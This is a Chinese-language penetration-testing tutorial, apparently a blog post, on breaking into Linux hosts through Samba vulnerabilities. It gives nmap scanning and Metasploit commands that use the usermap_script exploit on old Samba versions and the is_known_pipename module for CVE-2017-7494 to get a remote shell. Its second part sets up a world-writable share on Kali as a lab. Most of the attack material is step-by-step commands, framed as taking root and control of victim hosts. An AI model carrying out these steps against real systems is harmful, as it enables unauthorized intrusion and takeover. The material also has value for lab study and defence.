利用 samba 服务漏洞入侵Linux主机

利用 samba 服务漏洞入侵Linux主机(CVE-2017-7494 与 samba 低版本漏洞利用)

Samba 是在Linux 和 UNIX 系统上实现 SMB协议的一个免费软件,由服务器及客户端程序构成 Samba 服务对应的端口有 139、445等等,本文将简单介绍 metasploit 利用 samba 漏洞入侵进入远程Linux主机

1、首先要扫描目标主机上开放的端口和服务,用 nmap命令如下:
nmap -sS -Pn -A 192.168.0.142
2、发现主机上开放的139,145端口之后,说明该主机有可能存在samba 服务远程溢出漏洞,尝试通过该端口建立一个 meterpreter会话,需要用到 metasploit
3、打开 metasploit 之后需要先判断samba的版本,命令如下:
msf> search scanner/samba
这条命令用来查找 samba 相关 exploit参数
4、然后使用如下命令来定义要扫描 samba 的版本所用到的 exploits 参数
msf> use auxiliary/scanner/smb/smb_version
msfauxiliary(smb_version) > set RHOSTS 192.168.0.102
这条命令定义你将要扫描 samba 版本的远程主机的IP 地址
5、发现 samba 版本之后,我们需要进一步利用来入侵进入到远程 Linux主机
msf exploit(usermap_script) > set RHOST 192.168.0.102
msf exploit(usermap_script) > exploit
执行完成以上命令如图所示,成功创建了 shell 会话

smb 其他漏洞 Linux smb漏洞(CVE-2017-7494)复现

  • 漏洞编号:CVE-2017-7494
  • 漏洞等级:严重
  • 影响版本:漏洞影响了 Samba 3.5.0 之后的版本不包含 4.6.4/4.5.10/4.4.14
  • 0x01:查看 samba版本打开samba 配置文件添加以下配置。
  • root@kali:~# samba -V
  • vi /etc/samba/smb.conf
[public]
	comment = public
	browseable = yes
	writeable = yes
	path = /tmp/public
	public = yes
	read only = no
[homes]
	comment = Home Directories
	browseable = no
  • 0X02:Kali Linux 里面创建 Samba 共享目录

创建共享目录
root@kali:~# mkdir /tmp/public
修改读写执行权限
root@kali:~# chmod 777 /tmp/public/
这是 SambaCry 漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在这个共享目录传递攻击代码并执行,获取到 Root权限并控制肉鸡

  • 0x03:Kali Linux 重启/启动 Samba 服务

重启 samba 服务
root@kali:~# /etc/init.d/ samba restart
查看 samba 进程
root@kali:~# ps aux | grep samba
查看 samba 端口状态(采用 139445 端口)
root@kali:~# netstat -tnlp samba

  • 0x04:更新 MSF 后使用 “exploit/linux/samba/is_known_pipename” 利用模块,设置 rhost 后直接 exploit 即可得到 shell
    **注意!**有的 poc 可能会存在 64位 和 32位之分

msf5> use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
msf5 exploit(linux/samba/is_known_pipename) > check
msf5 exploit(linux/samba/is_known_pipename) > set rhost xxx / set rport xxx / run / exploit

你可能感兴趣的:(Kali,Linux,-,渗透测试,linux,安全,服务器)